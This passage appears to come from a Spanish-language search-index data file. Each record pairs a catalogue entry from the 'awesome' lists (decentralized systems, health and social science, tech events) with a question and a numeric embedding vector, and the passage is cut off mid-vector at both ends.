-0.02184, -0.08656, 0.00733, -0.01845, -0.05855, -0.01929, -0.01795, 0.05559, 0.03539, -0.08878, 0.03049, -0.08607, 0.00602, 0.01829, -0.015, -0.07885, -0.05613, -0.03803, -0.01152, -0.01999, -0.01416, 0.06046, -0.00288, -0.02894, -0.02742, 0.00774, 0.03557, 0.0509, 0.01242, -0.05921, -0.02677, 0.10073, -0.03243, -0.04076, 0.0161, 0.00536, -0.02933, 0.02275, 0.00393, 0.04724, -0.01554, 0.01354, -0.00164, -0.04797, 0.06274, 0.02593, 0.09813, -0.06347, -0.03046, -0.00107, 0.01021, 0.00575, 0.04103, -0.04386, -0.00229, -0.03125, 0.05127, -0.0308, 0.00073, 0.02861, 0.00686, -0.01075, -0.03822, -0.00783, 0.01688, -0.07945, -0.05762, -0.04276, -0.03407, -0.07827, 0.02973, 0.0394, -0.03093, 0.06674, 0.0179]} +{"tipo": "pregunta", "herramienta": "Decentralized Systems", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Decentralized Systems", "tema": "decentralized systems", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Decentralized Systems: Cosmos SDK β€” Modular framework for building app-specific blockchains in Go. Tor β€” A free overlay network for enabling anonymous communication. ATProto β€” Open, decentralized network for building social apps.", "indexar": "que programa sirve para construir cadenas de bloques especΓ­ficas en Go?", "v": [0.11888, -0.01811, -0.14421, -0.09138, 0.00098, -0.12945, 0.08896, 0.00827, -0.06246, -0.14204, -0.00844, 0.03563, -0.16495, -0.09602, 0.08535, 0.02937, 0.01286, -0.13808, 0.01681, 0.05457, -0.06675, -0.05536, 0.10182, -0.07582, -0.00635, 0.00471, 0.04061, -0.08634, -0.12567, 0.06134, 0.00746, -0.04207, 0.0464, -0.06887, -0.08648, -0.07173, 0.00711, 0.02632, -0.06277, -0.03362, -0.06607, -0.00988, -0.10528, -0.03962, -0.0332, -0.02012, 0.17281, 0.03207, -0.05502, -0.04806, -0.10648, -0.01503, -0.06189, -0.06634, 0.07811, -0.04254, 0.06555, -0.09156, -0.12869, 0.12413, -0.04949, -0.0682, 0.13942, -0.0599, 0.03597, 0.01051, -0.0277, 0.04543, -0.06997, -0.07845, -0.09693, -0.05473, -0.00785, 0.05276, -0.00785, 0.08567, -0.02459, -0.03842, 0.01833, 0.01545, 0.00355, -0.05363, -0.0021, 0.05402, 0.06737, 0.13455, -0.06305, -0.00471, -0.02436, -0.0427, 0.05645, 0.11148, -0.02592, 0.06399, 0.08457, -0.02119, 0.11762, 0.0926, 0.11118, 0.02052, 0.0193, -0.05643, -0.05148, 0.08903, 0.00873, 0.13896, 0.01165, -0.01382, -0.00051, -0.02951, 0.00679, 0.04644, -0.04501, -0.10428, -0.10194, 0.00699, -0.06705, -0.03311, -0.00086, -0.00421, -0.07069, 0.09492, -0.06231, -0.02447, 0.05801, 0.00812, -0.09623, 0.08153, -0.03375, 0.03119, -0.09213, 0.07891, -0.03197, -0.00239, -0.14885, -0.05955, 0.07698, -0.06453, -0.01745, -0.12412, 0.08032, 0.05008, 0.02935, 0.03045, -0.00636, 0.00148, -0.02385, -0.13074, 0.00171, 0.0832, 0.01124, 0.03958, 0.00067, 0.00334, -0.07304, -0.1043, -0.03795, -0.08638, -0.05011, 0.13003, 0.03399, -0.00766, -0.01009, 0.01585, 0.0402, -0.0423, -0.11344, 0.10414, 0.07839, 0.07236, -0.0347, -0.00296, 0.05711, -0.05182, -0.0538, -2e-05, -0.02361, -0.05872, -0.03857, -0.06632, -0.1108, -0.00849, 0.02002, 0.00138, 0.00447, -0.07314, -0.07645, -0.01351, 0.0665, 0.03579, 0.00604, -0.01347, -0.02525, 0.00448, -0.01387, -0.01789, 0.00564, -0.0322, 0.01619, -0.0349, -0.05709, 0.02733, 0.03055, 0.00029, 0.0402, 0.11743, -0.06672, 0.00546, 0.0606, 0.12276, 0.07996, -0.05593, 0.01583, -0.0339, 0.0034, -0.03154, 0.01377, 0.04695, 0.0206, 0.05473, -0.01527, 0.04628, 0.00553, 0.04521, 0.00267, -0.04101, 0.05872, 0.03999, 0.01549, 0.02868, -0.00433, -0.05646, -0.04455, 0.01345, -0.00755, -0.00627, -0.05113, 0.02194, -0.02286, -0.01951, -0.05589, 0.08311, -0.05027, -0.00737, 0.01807, 0.04533, -0.04252, 0.05452, 0.02384, -0.05764, -0.05331, 0.05576, -0.00278, -0.04917, 0.00803, 0.00999]} +{"tipo": "pregunta", "herramienta": "Decentralized Systems", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Decentralized Systems", "tema": "decentralized systems", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Decentralized Systems: Cosmos SDK β€” Modular framework for building app-specific blockchains in Go. Tor β€” A free overlay network for enabling anonymous communication. ATProto β€” Open, decentralized network for building social apps.", "indexar": "cual es una red descentralizada para crear aplicaciones sociales abiertas?", "v": [-0.0691, 0.08537, -0.05325, -0.12628, 0.00712, -0.15666, -0.06582, -0.03206, -0.06298, -0.00684, -0.15336, -0.22225, -0.12507, -0.09401, 0.09351, -0.03101, 0.01433, -0.01274, 0.07357, -0.01414, -0.05132, 0.02473, -0.11567, -0.04616, -0.02395, 0.00094, 0.04298, -0.14822, -0.06533, 0.0446, 0.05175, -0.01085, 0.04416, 0.01629, -0.04301, -0.01495, 0.0256, -0.01639, -0.14727, -0.02562, -0.01949, 0.03659, -0.10721, 0.01289, 0.02417, 0.03485, 0.0451, -0.03986, -0.12527, -0.00711, -0.12776, -0.09153, -0.15642, -0.03911, -0.0272, -0.08424, 0.01368, -0.09541, -0.08567, 0.02365, -0.07887, 0.08995, -0.0018, 0.02871, 0.02765, -0.14043, -0.002, 0.13875, -0.04817, 0.1187, 0.01544, 0.07416, -0.02488, 0.05725, 0.11059, 0.09792, -0.17181, -0.05041, -0.02923, 0.01844, -0.01023, 0.06609, -0.02087, 0.01269, 0.01413, -0.05934, 0.08142, -0.03591, 0.00045, -0.05066, 0.02279, -0.0211, -0.07486, 0.01639, 0.04713, -0.05646, 0.02257, -0.03386, 0.02162, 0.09503, -0.04926, -0.10834, -0.06682, -0.06986, -0.074, -0.07529, 0.01402, -0.11704, 0.08528, -0.01696, 0.05026, -0.08945, 0.0567, 0.06399, 0.02635, 0.03214, -0.07896, 0.00051, 0.02881, -0.07537, -0.02347, -0.05812, -0.05185, -0.11035, 0.03783, 0.01927, 0.00966, 0.05764, -0.00348, 0.10945, -0.02282, -0.0209, -0.11756, -0.03545, -0.05113, -0.05587, 0.02871, -0.05053, 0.03409, -0.06657, 0.02654, 0.06128, -0.02398, -0.12111, 0.03207, 0.07046, 0.0458, -0.06693, -0.01107, 0.07923, -0.00505, -0.00231, -0.05759, -0.01204, -0.08442, 0.04495, -0.05908, -0.07258, -0.00611, 0.09157, -0.04849, 0.01999, -0.08168, -0.08223, -0.04627, -0.05994, 0.02311, 0.00719, 0.11903, 0.01823, -0.00248, 0.05099, 0.02399, -0.02776, 0.08208, -0.10616, -0.00836, -0.10511, 0.02018, -0.10185, -0.06549, -0.00892, -0.00599, 0.00956, 0.01876, -0.08969, -0.05758, -0.02488, 0.03658, 0.04402, -0.0739, -0.05521, -0.00716, 0.01378, 0.10007, -0.03253, 0.03476, -0.071, -0.02843, -0.05848, -0.0533, 0.00159, -0.05853, 0.01099, -0.03921, 0.06119, -0.01538, 0.06768, -0.06064, 0.09048, -0.00036, 0.00457, 0.05736, 0.05281, -0.06039, -0.0626, 0.03534, -0.00929, 0.02605, -0.024, 0.02376, -0.01266, 0.0136, 0.02446, 0.0099, 0.04462, 0.02287, 0.00337, 0.01019, -0.00831, 0.01315, -0.02265, 0.00997, -0.02149, 0.02323, 0.02159, 0.05188, 0.02889, 0.00336, -0.03771, 0.01936, 0.11104, -0.00902, -0.01003, 0.0006, -0.02467, -0.06549, 0.05379, -0.03887, -0.09924, -0.02875, 0.0441, 0.05202, -0.03953, 0.05516, -0.01559]} +{"tipo": "pregunta", "herramienta": "Decentralized Systems", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Decentralized Systems", "tema": "decentralized systems", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Decentralized Systems: Cosmos SDK β€” Modular framework for building app-specific blockchains in Go. Tor β€” A free overlay network for enabling anonymous communication. ATProto β€” Open, decentralized network for building social apps.", "indexar": "con que herramienta puedo habilitar la comunicaciΓ³n anΓ³nima?", "v": [0.19293, 0.19131, -0.05871, -0.17149, 0.02166, -0.13824, -0.04864, 0.05052, -0.23387, 0.00336, -0.05827, -0.0701, 0.03451, 0.04196, 0.05177, 0.12406, 0.09983, -0.03461, -0.04847, 0.09502, -0.00314, 0.03787, -0.11187, -0.02357, -0.03192, -0.12675, 0.03049, -0.02727, -0.0308, -0.00826, -0.05879, 0.00287, 0.06973, 0.06978, -0.04894, 0.04625, -0.11367, 0.08346, 0.06845, -0.01772, -0.04506, -0.01248, -0.04635, 0.05041, 0.0966, 0.06399, -0.05041, -0.037, 0.02372, 0.11784, -0.09076, -0.14388, -0.14118, -0.05572, -0.03199, -0.03664, 0.26845, -0.07815, -0.05346, -0.08649, 0.08165, 0.03569, -0.02443, 0.00364, 0.05313, -0.00305, 0.06646, -0.10403, -0.14069, 0.16036, -0.02677, 0.01145, 0.03204, 0.09006, 0.08537, 0.0227, -0.12238, 0.07487, 0.07968, 0.04103, 0.05614, -0.06033, -0.01786, 0.02923, -0.01832, -0.00143, 0.00512, -0.0565, -0.00726, -0.06934, -0.0199, 0.07824, -0.03846, -0.06082, 0.06365, -0.00909, -0.01374, -0.05978, -0.10273, -0.03979, 0.075, 0.03713, -0.09907, 0.01276, 0.00638, -0.05606, -0.04315, -0.09134, 0.03153, -0.06924, 0.06926, 0.00862, 0.04885, -0.03497, -0.03003, 0.07916, -0.05663, -0.09473, -0.01961, -0.02782, 0.00211, -0.02259, -0.05405, -0.01993, -0.00316, -0.04329, -0.10355, 0.05823, -0.00238, 0.00732, 0.01245, -0.02292, -0.02105, -0.05843, -0.03919, 0.0527, 0.0197, -0.07612, 0.03563, -0.06214, -0.05226, 0.00336, -0.04676, -0.1053, 0.03471, 0.06345, -0.03859, -0.06767, -0.01959, 0.00913, 0.01157, -0.0387, -0.02018, 0.07056, 0.00095, 0.05114, -0.03404, -0.02671, -0.02225, 0.04266, -0.09336, -0.02466, 0.01889, -0.02416, 0.06082, -0.07771, -0.02094, 0.00289, -4e-05, 0.02549, 0.01389, -0.03387, 0.10356, -0.03751, 0.00783, -0.00947, -0.06737, 0.04078, -0.04286, -0.13223, -0.02162, -0.0092, -0.07398, -0.09647, 0.04194, 0.00743, -0.01148, -0.0791, 0.02563, 0.01041, 0.02974, 0.00577, -0.01338, -0.05498, 0.01982, 0.01991, -0.03139, -0.08886, 0.07269, 0.02628, -0.01305, 0.04396, 0.01011, -0.0054, 0.01135, 0.09458, 0.00598, -0.01338, -0.00962, 0.02886, 0.06368, -0.02989, 0.01303, -0.03696, -0.00096, 0.03, -0.00498, -0.04843, -0.00892, 0.02909, 0.08334, 0.04387, 0.04273, -0.01978, 0.01083, 0.04599, -0.00333, 0.00233, -0.02204, -0.00664, -0.05248, -0.01144, 0.00422, -0.01578, 0.05118, -0.05594, 0.02543, -0.03224, -0.06115, -0.0159, 0.01087, 0.04432, -0.00942, 0.01859, -0.03462, -0.0769, -0.02455, -0.00802, -0.03834, -0.11031, -0.01009, 0.04347, 0.04771, -0.05472, 0.04986, -0.02851]} +{"tipo": "pregunta", "herramienta": "Health and Social Science", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Health and Social Science", "tema": "health and social science", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Health and Social Science: Biomedical Information Extraction β€” How to extract information from unstructured biomedical data and text. Computational Neuroscience β€” A multidisciplinary science which uses computational approaches to study the nervous system. Diversity β€” Creating a more inclusive and diverse tech community. Digital History β€” Computer-aided scientific investigation of history. Empathy in Engineering β€” Building and promoting more compassionate engineering cultures. Healthcare β€” Open source healthcare software for facilities, providers, developers, policy experts, and researchers. Mental Health β€” Awareness and self-care in the software industry. Neuroscience β€” Study of the nervous system and brain. Digital Humanities β€” Software for humanities scholars using quantitative or computational methods. Lucid Dreams β€” A dream where one becomes aware they are dreaming. Neuroimaging β€” Software for analyzing brain data from living subjects. Transgender β€” Someone whose gender identity differs from their assigned birth sex.", "indexar": "que herramienta sirve para extraer informaciΓ³n de textos biomΓ©dicos desestructurados?", "v": [-0.14385, -0.09974, -0.07736, -0.13044, 0.23123, -0.11534, -0.07649, -0.06095, -0.02184, -0.12712, -0.0935, -0.00839, 0.03442, -0.06729, 0.10974, -0.02322, 0.18357, -0.11216, -0.11633, -0.05061, 0.04761, -0.01588, -0.12241, 0.15632, -0.05369, -0.07871, -0.06722, -0.02871, -0.13007, 0.15025, -0.01054, 0.07203, 0.14945, -0.10321, -0.07939, 0.00895, -0.02474, -0.00563, -0.11354, 0.07058, -0.00732, 0.00657, 0.05176, -0.04984, -0.02671, -0.02492, -0.0276, 0.03067, -0.04718, 0.03387, -0.04686, -0.07896, -0.17161, -0.05574, -0.14244, -0.10516, 0.24432, -0.12522, -0.02826, -0.00338, 0.08905, 0.00607, -0.00059, -0.07256, 0.0203, -0.06159, -0.02728, -0.06839, -0.05693, 0.11855, -0.03141, 0.04141, 0.09103, 0.02066, -0.05266, -0.02655, -0.04147, 0.07992, 0.04658, 0.0889, 0.03952, 0.00501, -0.12948, 0.05252, 0.0064, -0.03822, 0.02004, 0.01741, -0.04659, -0.09838, 0.02946, 0.00562, -0.01053, -0.0196, -0.0263, -0.02759, 0.0275, -0.00999, -0.00503, 0.10115, 0.06966, -0.09486, -0.02686, 0.04118, -0.02129, 0.01182, -0.02958, -0.00232, -0.06981, -0.00098, 0.02812, 0.00543, 0.03929, -0.00402, -0.0709, 0.02943, -0.01234, 0.05512, -0.03009, -0.05344, 0.02233, 0.00929, -0.02683, -0.07146, -0.0298, -0.00151, -0.01776, 0.06476, 0.08193, -0.06928, 0.01099, -0.01356, -0.06307, 0.0079, -0.03881, -0.11237, 0.06193, -0.06444, -0.04199, -0.07022, 0.02015, 0.00829, -0.11111, 0.01031, -0.0331, 0.02695, 0.03965, 0.0006, 0.02134, -0.04273, 0.03153, 0.01383, 0.05757, 0.05033, -0.10394, 0.01636, -0.04827, 0.01476, -0.11493, 0.0112, -0.10146, -0.06723, 0.00532, 0.02893, -0.01724, 0.01411, -0.08024, -0.09058, 0.0289, 0.01192, 0.02771, -0.00509, 0.08276, -0.06302, -0.02565, 0.00342, -0.01691, 0.05274, -0.016, -0.00132, -0.05667, -0.04608, -0.06955, -0.04595, 0.02241, -0.04971, -0.00998, 0.00589, -0.05985, 0.01948, 0.01269, 0.0527, 0.01814, -0.02709, -0.02818, 0.00808, -0.07187, -0.03087, 0.08284, -0.04029, -0.0196, 0.024, 0.01868, 0.02434, -0.007, 0.08783, -0.01392, -0.04178, -0.04931, 0.0876, 0.05829, 0.01355, 0.00827, 0.01537, -0.029, -0.02243, 0.0402, 0.00173, 0.01088, 0.03578, -0.00549, 0.00723, 0.12495, 0.01569, 0.00075, -0.0076, 0.03517, -0.00852, 0.01232, 0.00621, 0.02714, -0.01733, 0.02363, 0.07371, 0.0257, -0.06713, 0.02612, -0.00153, -0.05912, -0.05983, -0.0061, 0.00947, -0.01246, -0.07499, -0.00784, -0.01316, -0.00336, -0.02797, -0.02201, -0.08003, -0.01612, -0.01028, 0.05914, -0.00589, 0.05729, 0.02782]} +{"tipo": "pregunta", "herramienta": "Health and Social Science", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Health and Social Science", "tema": "health and social science", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Health and Social Science: Biomedical Information Extraction β€” How to extract information from unstructured biomedical data and text. Computational Neuroscience β€” A multidisciplinary science which uses computational approaches to study the nervous system. Diversity β€” Creating a more inclusive and diverse tech community. Digital History β€” Computer-aided scientific investigation of history. Empathy in Engineering β€” Building and promoting more compassionate engineering cultures. Healthcare β€” Open source healthcare software for facilities, providers, developers, policy experts, and researchers. Mental Health β€” Awareness and self-care in the software industry. Neuroscience β€” Study of the nervous system and brain. Digital Humanities β€” Software for humanities scholars using quantitative or computational methods. Lucid Dreams β€” A dream where one becomes aware they are dreaming. Neuroimaging β€” Software for analyzing brain data from living subjects. Transgender β€” Someone whose gender identity differs from their assigned birth sex.", "indexar": "con quΓ© puedo analizar datos del escaneo cerebral de sujetos vivos?", "v": [-0.07186, -0.10566, -0.1455, 0.0276, -0.00076, -0.09777, -0.06185, -0.06544, -0.04889, -0.14108, 0.01947, -0.06187, -0.13364, -0.02898, 0.13859, 0.05831, 0.11743, -0.0345, 0.02418, 0.07777, 0.00396, -0.15655, -0.02343, 0.08459, -0.06333, 0.00821, -0.04988, 0.08474, 0.0387, 0.13821, -0.0473, 0.07367, 0.01935, -0.05673, 0.03076, 0.1069, -0.09492, 0.07917, 0.01039, 0.07352, -0.08807, 0.01366, -0.07369, -0.05322, 0.05735, -0.0481, -0.18054, -0.06545, -0.07027, -0.08193, -0.00282, 0.11305, -0.06775, -0.10745, -0.03749, -0.00891, -0.00419, -0.02526, 0.21711, -0.06879, -0.07704, 0.15983, 0.13741, -0.00608, -0.089, -0.0343, 0.13673, 0.02496, -0.00158, 0.08808, -0.04365, 0.03984, 0.00953, 0.00123, 0.05069, -0.01356, 0.01079, -0.03202, 0.14343, 0.07158, -0.05178, -0.04495, -0.10208, 0.06983, -0.02629, 0.00909, 0.05419, 0.00118, -0.05706, -0.07359, 0.03081, -0.02847, 0.09887, 0.08619, -0.02734, 0.12728, 0.04286, -0.00813, 0.02251, 0.07483, 0.00682, 0.01087, -0.15545, 0.08099, 0.05693, 0.07694, 0.01439, -0.05745, -0.03911, -0.01334, -0.06834, 0.04664, -0.061, -0.05709, -0.04136, 0.05726, -0.01498, 0.03361, 0.10935, 0.03787, 0.00276, 0.00707, 0.0256, -0.02921, -0.06671, -0.00491, -0.01241, 0.0593, 0.12112, 0.102, 0.01256, 0.06582, -0.03133, -0.04671, -0.02719, 0.05917, 0.03329, -0.04937, 0.00659, -0.0102, -0.02689, 0.01258, -0.10021, -0.01029, -0.05155, -0.00924, -0.07795, 0.05948, -0.12536, 0.01859, 0.05551, 0.02297, 0.03974, 0.0083, -0.04223, -0.02563, 0.01696, -0.0443, 0.03198, -0.01485, -0.05395, 0.04616, -0.00922, 0.08459, -0.03001, -0.10095, -0.05415, -0.06573, 0.03415, 0.0793, -0.02095, -0.04403, -0.03028, -0.07845, 0.04223, -0.04315, -0.03866, -0.02437, 0.02438, -0.1013, -0.00231, 0.07698, -0.04442, -0.05106, -0.07366, -0.04271, 0.00753, 0.00562, -0.00372, -0.04099, -0.00428, 0.11885, 0.02054, 0.00874, 0.07747, -0.00406, -0.03548, 0.00939, 0.01183, 0.02729, -0.01808, 0.0904, -0.01305, 0.00351, -0.02168, 0.02479, -0.02139, 0.00945, -0.00231, 0.05283, -0.07644, -0.08089, 0.04594, -0.02185, -0.0221, 0.0134, 0.04763, 0.00129, -0.00233, 0.02535, 0.02464, 0.01461, 0.05735, -0.0017, -0.11102, 0.00824, 0.03467, 0.02121, 0.048, -0.00421, -0.02474, -0.02053, 0.008, -0.02019, 0.01025, 0.04724, -0.00398, -0.00695, 0.00164, -0.02235, 0.03977, 0.07913, -0.11001, -0.03011, 0.03767, -0.03094, -0.07298, 0.0221, 0.02479, -0.1032, -0.02312, -0.01483, 0.00052, -0.06366, 0.04399, -0.06579]} +{"tipo": "pregunta", "herramienta": "Health and Social Science", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Health and Social Science", "tema": "health and social science", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Health and Social Science: Biomedical Information Extraction β€” How to extract information from unstructured biomedical data and text. Computational Neuroscience β€” A multidisciplinary science which uses computational approaches to study the nervous system. Diversity β€” Creating a more inclusive and diverse tech community. Digital History β€” Computer-aided scientific investigation of history. Empathy in Engineering β€” Building and promoting more compassionate engineering cultures. Healthcare β€” Open source healthcare software for facilities, providers, developers, policy experts, and researchers. Mental Health β€” Awareness and self-care in the software industry. Neuroscience β€” Study of the nervous system and brain. Digital Humanities β€” Software for humanities scholars using quantitative or computational methods. Lucid Dreams β€” A dream where one becomes aware they are dreaming. Neuroimaging β€” Software for analyzing brain data from living subjects. Transgender β€” Someone whose gender identity differs from their assigned birth sex.", "indexar": "cual es una alternativa libre para investigar la historia con mΓ©todos computacionales?", "v": [-0.16322, 0.06009, -0.02493, -0.06915, -0.03369, -0.20293, -0.02422, -0.05843, -0.17735, -0.12841, -0.0494, -0.16812, -0.03514, 0.06529, 0.06758, -0.08232, 0.16856, -0.10417, 0.19048, -0.17184, -0.05562, -0.08346, -0.08911, -0.09771, -0.09331, -0.0732, -0.09869, 0.02156, 0.00795, -0.00078, -0.06677, 0.07303, 0.01352, -0.02393, -0.14124, 0.07171, 0.17366, 0.07272, -0.02756, 0.02091, -0.03441, -0.09006, -0.09801, 0.0903, 0.07709, -0.06575, -0.14239, 0.04399, -0.08786, 0.02775, 0.00255, 0.01082, -0.05943, -0.01514, 0.0547, -0.05888, 0.02337, -0.02687, -0.01972, 0.01894, -0.05607, 0.03884, -0.01085, -0.05729, 0.08028, -0.05782, -0.01656, -0.07413, -0.01463, 0.11751, 0.0873, 0.00967, -0.07055, 0.01087, -0.08065, 0.01251, 0.00943, -0.03201, 0.08533, 0.01992, -0.0401, -0.02956, -0.03697, 0.06685, 0.01535, -0.08982, 0.05956, -0.06322, 0.03378, 0.07196, -0.00098, 0.06127, 0.01214, 0.10352, 0.0467, -0.04273, 0.14071, 0.03982, 0.02244, 0.06447, 0.03465, 0.02495, -0.08936, 0.10994, 0.05268, 0.03699, -0.06745, 0.01925, -0.04768, -0.04674, -0.02015, 0.07195, -0.07948, 0.07307, -0.03531, -0.10757, -0.00701, 0.04588, -0.04101, -0.04966, -0.04302, 0.06336, -0.00869, -0.00259, -0.01911, 0.0075, 0.04564, 0.02966, -0.04341, 0.01611, 0.0721, -0.05859, -0.05129, -0.04677, -0.07894, -0.07162, 0.08234, -0.07023, 0.04992, -0.03491, 0.0393, 0.04916, 0.00689, -0.07352, 0.06363, -0.05855, 4e-05, -0.01289, -0.05637, -0.07495, -0.01462, -0.01121, -0.0352, 0.13765, -0.07693, -0.01994, 0.04352, 0.01061, -0.1055, 0.09958, 0.07749, -0.03169, 0.02366, -0.02786, 0.04702, -0.08241, -0.00855, -0.01339, -0.10366, -0.03033, -0.01088, 0.03588, 0.03706, -0.07879, -0.00391, -0.0404, -0.05071, -0.085, 0.01577, -0.02178, -0.00955, 0.01887, -0.00036, -0.01458, -0.03838, -0.10467, 0.03818, 0.0234, 0.03338, -0.03679, -0.00251, -0.01669, -0.06606, -0.02531, -0.0468, 0.0716, 0.03881, -0.01535, -0.0118, 0.00481, -0.06458, 0.08047, -0.00088, 0.01924, -0.03961, 0.0292, -0.00334, 0.0143, -0.00458, -0.05021, 0.04557, 0.03143, 0.0423, 0.02517, -0.08453, 0.03153, -0.04406, -0.05521, -0.05776, -0.01715, 0.03655, 0.00679, -0.01683, 0.01431, -0.02133, 0.00599, 0.03294, 0.05715, -0.0525, -0.04949, -0.02137, 0.05063, -0.01799, 0.06708, -0.00259, 0.03907, -0.00112, -0.03683, -0.00135, -0.01303, 0.02101, 0.08805, -0.03555, 0.0219, -0.01155, -0.01942, -0.09073, 0.00323, -0.01216, -0.06513, 0.01564, 0.03967, 0.02263, -0.02319, 0.05419, -0.00203]} +{"tipo": "pregunta", "herramienta": "Events", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Events", "tema": "events", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Events: Creative Tech Events β€” Events around the globe for creative coding, tech, design, music, arts and cool stuff. Events in Italy β€” Tech-related events in Italy. Events in the Netherlands β€” Tech-related events in the Netherlands.", "indexar": "ΒΏHay eventos de programaciΓ³n creativa y tecnologΓ­a en Italia?", "v": [-0.10723, -0.04708, -0.09177, -0.20479, 0.04487, -0.14176, -0.0365, -0.02676, 0.06894, -0.00534, -0.0054, -0.0452, 0.0699, 0.05334, -0.01076, 0.07868, 0.15113, -0.08888, 0.15236, -0.10853, -0.1536, 0.07884, -0.14668, -0.1159, 0.01903, -0.14716, -0.024, 0.07838, -0.08086, 0.01325, 0.06823, 0.01955, 0.0881, -0.05696, -0.09263, -0.04145, 0.07319, -0.03735, -0.01857, -0.04929, -0.03299, -0.03953, 0.03723, -0.00012, 0.10861, 0.04634, 0.09296, 0.0044, -0.09324, -0.00579, -0.03275, 0.11461, 0.00168, -0.00477, 0.07925, -0.00921, -0.06078, -0.08985, -0.07689, -0.09805, -0.01848, -0.01353, -0.09139, 0.01477, -0.01652, 0.08326, -0.05052, -0.09587, -0.04084, 0.09918, -0.00935, -0.03303, -0.04524, -0.01929, 0.11742, 0.04486, -0.06222, -0.06334, -0.07941, -0.00435, -0.14223, 0.02023, 0.00047, -0.00507, -0.05704, 0.00483, 0.07626, -0.03258, -0.12965, -0.01287, 0.06111, 0.12324, 0.0409, -0.07207, -0.02344, 0.04142, 0.13606, -0.00196, 0.0475, 0.07444, -0.06138, -0.14169, -0.0452, 0.03897, -0.06107, 0.07314, 0.08252, 0.03879, 0.11516, 0.00807, -0.06149, 0.03554, -0.03209, -0.01988, -0.10182, 0.07446, 0.12888, -0.07531, 0.00857, 0.04109, -0.06946, 0.11675, 0.1159, -0.09039, 0.09957, 0.10045, -0.05027, 0.0826, -0.03826, 0.02913, 0.07733, -0.1009, 0.02187, 0.03928, 0.01086, 0.01148, 0.02591, -0.02531, 0.04272, -0.02527, 0.01583, 0.04279, -0.03691, 0.02771, -0.00695, 0.00725, 0.05561, -0.00123, -0.01353, 0.03339, -0.03922, 0.03342, -0.05446, 0.04436, -0.15747, -0.00678, -0.0736, -0.02463, -0.06296, 0.06277, -0.13285, 0.05114, -0.05482, 0.0047, -0.02181, 0.01636, -0.00315, 0.03012, 0.05264, 0.11679, -0.0713, 0.05411, 0.01575, -0.11214, -0.03193, 0.00249, 0.02459, -0.06714, -0.09126, -0.12322, -0.05173, -0.01183, 0.01668, -0.07599, 0.0816, -0.02912, 0.03483, 0.03908, 0.01571, 0.06538, -0.02935, 0.07636, -0.02943, -0.01987, -0.01924, 0.00846, -0.03051, -0.00549, -0.03081, 0.01072, -0.01668, 0.04341, 0.00837, 0.01915, -0.02526, 0.03466, -0.00607, 0.00676, -0.03475, 0.00565, 0.00059, -0.00994, 0.01815, 0.02149, -0.05917, 0.03242, -0.00476, 0.00384, 0.03154, -0.01509, -0.01369, -0.05904, -0.05545, 0.0147, 0.05447, -0.04424, 0.02571, -0.00291, -0.00984, -0.02152, -0.01849, 0.0185, 0.01441, 0.01649, 0.00865, -0.01547, 0.01932, -0.02669, -0.00489, -0.02146, -0.03041, 0.00738, 0.01557, -0.02442, -0.01847, -0.0181, -0.09373, 0.01798, -0.03955, -0.01176, 0.00155, 0.00707, 0.01237, -0.06741, 0.03945, 0.05304]} +{"tipo": "pregunta", "herramienta": "Events", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Events", "tema": "events", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Events: Creative Tech Events β€” Events around the globe for creative coding, tech, design, music, arts and cool stuff. Events in Italy β€” Tech-related events in Italy. Events in the Netherlands β€” Tech-related events in the Netherlands.", "indexar": "ΒΏCon quΓ© puedo encontrar reuniones sobre arte digital y diseΓ±o en Holanda?", "v": [-0.01863, -0.01305, -0.07713, -0.04159, -0.03193, -0.03412, -0.03479, -0.0029, -0.12922, -0.07107, -0.12719, -0.1567, -0.0799, -0.13403, 0.0208, -0.01403, 0.06743, -0.12729, -0.00953, -0.10781, -0.10165, 0.0237, -0.09613, -0.00872, -0.0018, -0.20233, 0.05964, 0.05328, -0.09979, 0.0428, 0.1576, -0.08434, -0.00393, 0.12011, -0.11514, -0.14832, 0.10791, 0.10411, 0.05565, -0.0247, -0.03027, 0.02992, 0.04095, -0.03244, -0.0137, 0.05586, -0.117, 0.04472, -0.11698, 0.09314, -0.06223, 0.0337, -0.07851, 0.15434, 0.05819, -0.02259, 0.0921, 0.0243, 0.09283, -0.17859, 0.02616, -0.0005, -0.08818, 0.00425, 0.05437, 0.06598, -0.02212, -0.03762, -0.07489, 0.04629, -0.03001, -0.03867, 0.01329, -0.04189, 0.13063, 0.0329, -0.06642, 0.02011, -0.08132, -0.15064, 0.07174, 0.01825, -0.04553, -0.0487, -0.04123, -0.04348, -0.03282, -0.07331, -0.02492, -0.05091, 0.02373, 0.06351, -0.02741, -0.12195, -0.03923, -0.06645, -0.0205, 0.0339, 0.06953, 0.0014, -0.04721, -0.02046, -0.07259, -0.01991, -0.13448, 0.0278, 0.04806, 0.03823, -0.02216, 0.00061, -0.058, -0.00298, -0.11706, 0.01712, -0.01589, -0.06056, 0.16557, 0.02822, 0.06854, -0.03494, 0.02842, 0.00053, 0.04504, 0.01425, 0.02071, 0.00976, -0.01825, 0.11138, -0.01579, -0.02132, -0.02037, 0.01445, -0.06756, 0.01335, 0.05217, 0.01554, 0.00918, -0.03366, 0.07185, -0.06396, -0.01903, 0.00454, 0.03652, -0.09095, -0.0304, 0.0021, 0.01883, -0.05349, -0.09086, 0.00896, -0.00833, 0.06051, 0.12277, -0.01702, 